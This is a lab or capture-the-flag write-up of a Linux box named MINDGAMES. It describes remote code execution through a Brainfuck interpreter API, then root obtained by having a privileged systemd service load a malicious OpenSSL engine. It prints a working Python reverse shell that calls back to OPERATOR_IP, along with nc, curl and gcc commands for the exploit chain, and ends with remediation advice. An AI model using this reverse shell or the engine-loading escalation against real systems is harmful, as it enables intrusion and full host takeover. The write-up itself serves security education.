Brainfuck API RCE and OpenSSL engine shared-object root
Intermediate Linux engagement: /api/bf executed Brainfuck that spawned a reverse shell; a root systemd unit invoked openssl with a loadable engine — a malicious .so completed privilege escalation.
- Case files
- Brainfuck API RCE and OpenSSL engine shared-object root
HTTP exposed a Brainfuck interpreter API. Encoded Python reverse shell via POST /api/bf; openssl engine abuse under a privileged service yielded root.
POST /api/bf executed encoded Python that connected back to the operator listener.
Malicious engine .so loaded by openssl under the root service spawned a root shell.
Engagement summary
HTTP exposed a Brainfuck interpreter API. Encoded Python reverse shell via POST /api/bf; openssl engine abuse under a privileged service yielded root.
MINDGAMES exposed a web UI and POST /api/bf that interpreted Brainfuck and ran the resulting side effects on the host. We encoded a Python reverse shell into BF, posted it, and caught a shell as the service user. Enumeration of server.service showed root invoking openssl with a custom engine path. Compiling a shared object that spawned a shell on engine load, then running openssl req -engine ./rootshell.so, returned root.
Business impact
Unsandboxed language interpreters on the internet are remote code execution. Privileged processes that load attacker-writable OpenSSL engines are root. Remove BF/eval endpoints from production; run crypto helpers without custom engines or with root-owned engine directories only.
Brainfuck API to reverse shell
POST /api/bf executed encoded Python that connected back to the operator listener.
PAYLOAD · PYTHON
rev.py
import socket, subprocess, os
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("OPERATOR_IP", 4444))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
subprocess.call(["/bin/bash", "-i"])OPERATOR · BF API
savvy@lab:~$ nmap -sC -sV 10.10.10.50
80/tcp open http
savvy@lab:~$ curl -s http://10.10.10.50/
# UI references /api/bf Brainfuck interpreter
savvy@lab:~$ nc -lnvp 4444
savvy@lab:~$ curl -d "<brainfuck_encoded_revshell>" -X POST http://10.10.10.50/api/bf
savvy@lab:~$
OpenSSL engine shared object to root
Malicious engine .so loaded by openssl under the root service spawned a root shell.
OPERATOR · ROOT
savvy@lab:~$ cat /etc/systemd/system/server.service
# root ExecStart invokes openssl with -engine
savvy@lab:~$ gcc -fPIC -o rootshell.o -c rootshell.c && gcc -shared -o rootshell.so -lcrypto rootshell.o
savvy@lab:~$ chmod +x rootshell.so && openssl req -engine ./rootshell.so
root@lab:~# id
uid=0(root) gid=0(root) groups=0(root)
Remediation
Delete interpreter APIs or run them in disposable containers with no egress. Pin OpenSSL engines to immutable paths; never load .so from world-writable directories as root.